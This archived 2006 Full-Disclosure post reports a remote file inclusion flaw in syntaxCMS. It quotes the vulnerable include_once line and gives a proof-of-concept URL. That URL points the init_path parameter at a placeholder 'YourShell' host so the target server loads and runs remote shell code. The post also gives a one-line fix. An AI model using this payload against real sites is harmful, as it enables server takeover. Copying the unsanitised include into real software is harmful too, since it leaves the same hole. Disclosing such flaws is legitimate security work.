lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4516fd6b.7841c057.6d6c.7c6c@mx.gmail.com>
Date: Sun, 24 Sep 2006 11:49:21 -0700
From: "MoHaJaLi" <mohajali2k4@...il.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Remote File Include in syntaxCMS


Remote File Include in syntaxCMS

Vulnerable File:

0004_init_urls.php

Vulnerable Code:

   1  <?php 
   2  include_once( $init_path . '/init.urls.php' );
   3  ?>

PoC:

http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&

Solution:
 
Remove This File...it's not needed...just used for tests

____

Found by MoHaJaLi


Greetz to Eddy_BAck0o

____


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ